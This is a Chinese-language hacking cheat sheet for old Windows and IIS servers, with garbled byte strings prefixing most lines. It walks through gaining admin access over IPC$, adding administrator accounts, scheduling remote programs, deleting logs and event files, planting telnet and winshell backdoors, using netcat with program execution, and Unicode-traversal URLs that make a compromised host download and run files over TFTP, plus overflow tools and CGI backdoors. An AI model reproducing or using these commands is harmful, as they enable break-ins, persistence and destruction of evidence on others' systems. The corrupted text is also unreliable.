网管和黑客都必须知道的命令
k�*+��ZLrT 常用的几条NET命令:
4��Og�G��Z d}G."wnG9, (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
6�j�e%LHhL BN>��$��LL (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
AG!a�=ufc0 \7?M�U�a.4 (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
AZ@�Z�o'� Bw�vc@(3v� (查看远程主机时间) net time \\IP地址
[Z&s0�f1Qb |�gxB;
�GG (定时启动某个程序) at \\IP地址 02:18 readme.exe
kj"�_Y"q=� WX$^[^=�HC (查看共享) net view \\IP地址
54�4�I#!�� (N�>ew)�Ke (查看netbios工作组列表) nbtstat -A IP地址
�CX2q�7azG ���:JG}%�� (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
*j;�r|P;g YuW\GSV0�0 (这两条把自己增加到管理员组): net user 用户名 密码 /add
g�?Ty5~:lq n���\NDi22 net localgroup Administrators 用户名 /add
x�a��ax�j� �5nw9zW
:' (断开连接) net use \\IP地址\ipc$ /delete
[�E�SQD5&� o� sH,(\4_ 扫尾:
@(5�RAYRV "k@��/Z7=� del C:\winnt\system32\logfiles\*.*
�J��A�2��} ^bw~$*"j�# del C:\winnt\ssytem32\config\*.evt
vX���)Y%I a��p_+C~%+ del C:\winnt\system32\dtclog\*.*
?B4QTx�9B� KTREOOu .t del C:\winnt\system32\*.log
S�~9kp?kR$ w3h�L.Z,kV del C:\winnt\system32\*.txt
G�+yz8@��� ~_\2\6%1^n del C:\winnt\*.txt
@B�w�l)G!| ��\)
O�Ny9 del C:\winnt\*.log
?UZ�yu�4O% GM9�2yi!8� 一、netsvc.exe
#S���Uq.�A `I:,[3_/�� 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
+0�04��2Yi n8�y�a$�bc netsvc /list \\IP地址
Q&�\�ks�M� /JY��i�^rZ netsvc schedule \\IP地址 /query
x�1ex�}�_\ �,;& P��KY netsvc \\IP地址 schedule /start
90I�3_[Ii� yU�l�QPrNX 二、OpenTelnet.exe
t`D@�bzLC% f}�uCiV!?v 远程启动主机的Telnet服务,并绑定端口到7878,例如:
�B��nc���� 89dC
bF3�b OpenTelnet \\IP地址 用户名 密码 1 7878
�AH�,F[�vS �:Bc�;.%� 然后就可以telnet到主机的7878端口,进入DOS方式下:
!�(tJ��Z5� +\m!�#�CSA telnet IP地址 7878
e��W<h�C�( Sg�y~Z^�� 三、winshell.exe
J��Fkjp�BS aDEP_�b;�� 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
M:M<bz V�u 0Ji��f.<�� p Path (查看winshell主程序的路径信息)
z���W&W�`( ^(B*��AE.� b reBoot (重新启动机器)
"61n?Z#,M[ sZ$ ~�a�bX d shutDown (关闭机器)
8=�Ht�+Br� \�OB3�gn�R s Shell (执行后你就会看到可爱的“C:\>”)
6g&�n��n�A ��\Ki#"%S� x eXit (退出本次登录会话,此命令并不终止winshell的运行)
[K QZH��Ie �T!�E� LH! CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
�(]dZ+"�O{ <�H#K�`|Ag 四、3389登陆器,GUI方式登录远程主机的
�j��3�F=P� *m�t���v�[ 五、elsave.exe
E':Z�_ ^4 �zK;t041�e 事件日志清除工具
351�'l7F\� 2%H�(���a) elsave -s \\IP地址 -l "application" -C
�s ��o�s�& �3E9j%sYk� elsave -s \\IP地址 -l "system" -C
CAO{$<�M5m �#d(r^U#�I elsave -s \\IP地址 -l "security" -C
;I'��["k%� )�2hoO_�l: 执行后成功清除应用程序日志,系统日志,安全日志
wkw/�AZ{27 �tam�/FzVw 六、hbulot.exe
w�x�rT(x�| �Reo0Z�U�> 开启win2kserver和winxp的3389服务
wtyu�"�=�
aT[7L�9Cw� hbulot [/r]
Z2�
�4 �m� �ay.IK�BXc 使用/r表示安装完成后自动重起目标使设置生效。
$�r�_��gFv ~��VKXL,.� 七、nc.exe(netcat.exe)
����$�T�0[ sP7���(1)\ 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
���n!nv.-n qa6up|xUnn 想要连接到某处: nc [-options] hostname port[s] [ports] ...
L1BpY�-= 'z:p8�"h�} 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
b.+\qaR� .(�ir2g�� 参数:
mYvm�_�t�9 <hd�CO<
0( -e prog 程序重定向,一旦连接,就执行 [危险!!]
*WG}�K?"/ <NO~TB�H�F -g gateway source-routing hop point[s], up to 8
+f+yh�0Dj� ��M�N4�}y5 -G num source-routing pointer: 4, 8, 12, ...
\h4y,��sl *q��BZi;1 -h 帮助信息
�K�<(R�Vh [OSU�ARm
v -i secs 延时的间隔
29oEk�aX2o 4YC`dpO'�� -l 监听模式,用于入站连接
?0X.�Ith^.
�lNw�?}H -n 指定数字的IP地址,不能用hostname
&ru�����bA ��&9>�d��� -o file 记录16进制的传输
:z7!�X�.*� 'cv/"26�#� -p port 本地端口号
�bcG�-js�- �D���Sp@ -r 任意指定本地及远程端口
�>�%,tyJ~ W#Z]��mt B -s addr 本地源地址
3-5lO�#�&# EQ �-\�tWY -u UDP模式
xh$��[E&2u ��b�;vO` -v 详细输出——用两个-v可得到更详细的内容
y-�mmc}B>N xC(��PH?�_ -w secs timeout的时间
^8)d�8�?�} �*k -UQLJ� -z 将输入输出关掉——用于扫描时
"-�s�z7}Mb 八、TFTPD32.EXE
3 ���a`-_< �8*X8U:.0o 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
K�"6�1i:F� q!4dK4�`#5 http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
Wu�(GC]lTG E�;N8{Ye_� 然后可以直接令文件运行:
F�(9�T;��F �<Co�h
&g_ http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
*���0�@e_h /VQ<}S[k}- 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
x,��+zw9�� ��
hT[O5�
一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
AyUVsIuPT= vj�b{h'v�� 一、一 Xscan命令行运行参数说明:
�B4C`3�@a� $Fj7��'@1( 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
dj#<,e\��� OB%y'mo�7] 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
fi1UUJ0
U; -c
tZ9�+LL xscan -file <主机列表文件名> <检测项目> [其他选项]
Q�a=;Elp:[ }�)��Jp5vv 其中<检测项目> 含义如下:
�6*�E�7}� s$�;�v )w$ -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
UZ��$p wjC ;%�}������ -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
J{Jxb1�:�c ��q!n|�Ju< -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
4{V�=X3,x� <Ip}uy��[Y -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
O;~1�M3I�i W$W7U|Z9y+ -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
t�F�4"28"h btOC\bUMfD [其他选项] 含义如下:
�N�^��)OlH �uAP|ASH9T -v: 显示详细扫描进度
PF~&!~S>W� 4D8q�� Gti -p: 跳过Ping不通的主机
�f`Nu�]�#i :�Vg,[\I{� -o: 跳过没有检测到开放端口的主机
L_(|5#IDw ��.3[YOM7h -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
